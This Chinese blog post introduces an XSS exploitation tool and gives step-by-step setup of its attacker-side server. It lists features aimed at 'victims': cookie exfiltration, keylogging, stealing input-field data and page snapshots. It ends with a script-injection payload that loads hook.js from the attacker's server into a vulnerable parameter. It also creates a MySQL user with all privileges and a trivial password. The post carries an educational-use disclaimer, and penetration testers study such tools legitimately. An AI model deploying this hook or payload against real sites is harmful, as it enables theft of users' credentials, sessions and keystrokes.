老K博客 - 一个源码和技术分享的博客

专注XSS跨站脚本漏洞利用工具

老K博客
2024-03-08 / 0 评论 / 29 阅读 / 正在检测是否收录...
广告

工具简介

XSS Exploitation Tool是一款渗透测试工具,专注于跨站脚本漏洞的利用。

该工具仅用于教育目的,请勿在真实环境中使用它!

工具功能:

  1. 有关受害浏览器的技术数据
  2. 受害者的地理位置
  3. 被吸引/访问过的页面的快照
  4. 被钩住/访问的页面的源代码
  5. 窃取输入字段数据
  6. 渗出cookie
  7. 键盘记录
  8. 显示警告框
  9. 重定向用户

165ead2163fe57

165ead22b6a9c8

工具安装

在 Debian 11 上测试,您可能需要 Apache、Mysql 数据库和 PHP 模块:


$ sudo apt-get install apache2 default-mysql-server php php-mysql php-curl php-dom
$ sudo rm /var/www/index.html

安装 Git 并提取 XSS-Exploitation-Tool 源代码:


$ sudo apt-get install git

$ cd /tmp
$ git clone https://github.com/Sharpforce/XSS-Exploitation-Tool.git
$ sudo mv XSS-Exploitation-Tool/* /var/www/html/

安装 Composer,然后安装应用程序依赖项:


$ sudo apt-get install composer
$ cd /var/www/html/
$ sudo chown -R $your_debian_user:$your_debian_user /var/www/
$ composer install
$ sudo chown -R www-data:$www-data /var/www/

初始化数据库

$ sudo mysql

创建具有特定权限的新用户:


MariaDB [(none)]> grant all on *.* to xet@localhost identified by 'xet';
Query OK, 0 rows affected (0.00 sec)

MariaDB [(none)]> flush privileges;
Query OK, 0 rows affected (0.00 sec)

MariaDB [(none)]> quit
Bye

创建数据库(将产生一个空页):
访问页面 http://server-ip/reset_database.php

修改javascript钩子文件
hook.js 是一个钩子文件 ,您需要将第一行的ip地址替换为XSS利用工具服务器的ip地址:

var address = "your server ip";

工具使用

首先,创建一个页面(或利用跨站脚本漏洞)来插入 Javascript 挂钩文件(请参阅根目录下的exploit.html):

?vulnerable_param=<script src="http://your_server_ip/hook.js"/>

然后,当受害者访问被挂钩的页面时,XSS利用工具服务器应该列出被挂钩的浏览器:
165ead2eb185b7

工具地址

本文共 301 个字数,平均阅读时长 ≈ 1分钟
广告
0

海报

正在生成.....

评论 (0)

语录
取消
CC BY-NC-ND